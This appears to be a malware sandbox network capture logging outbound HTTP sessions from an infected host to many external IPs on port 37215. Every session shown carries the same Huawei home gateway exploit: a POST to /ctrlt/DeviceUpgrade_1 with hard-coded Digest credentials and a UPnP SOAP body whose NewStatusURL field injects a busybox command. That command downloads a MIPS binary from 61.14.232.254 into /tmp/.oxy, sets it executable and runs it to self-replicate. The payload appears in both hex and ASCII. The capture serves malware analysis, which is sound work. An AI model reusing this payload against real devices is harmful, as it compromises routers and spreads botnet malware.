69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  770192.168.2.1349542197.13.161.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416552067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  771192.168.2.1342854197.69.57.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416610003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  772192.168.2.1335502169.133.150.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416613102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  773192.168.2.1353108157.212.57.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416624069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  774192.168.2.134664075.76.110.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416647911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  775192.168.2.134599441.221.227.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416651964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  776192.168.2.1356422197.134.196.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416784048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  777192.168.2.1343604150.72.29.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416806936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  778192.168.2.1337744197.166.193.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417013884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  779192.168.2.1343518157.39.19.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417089939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  780192.168.2.1360814208.38.129.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417115927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
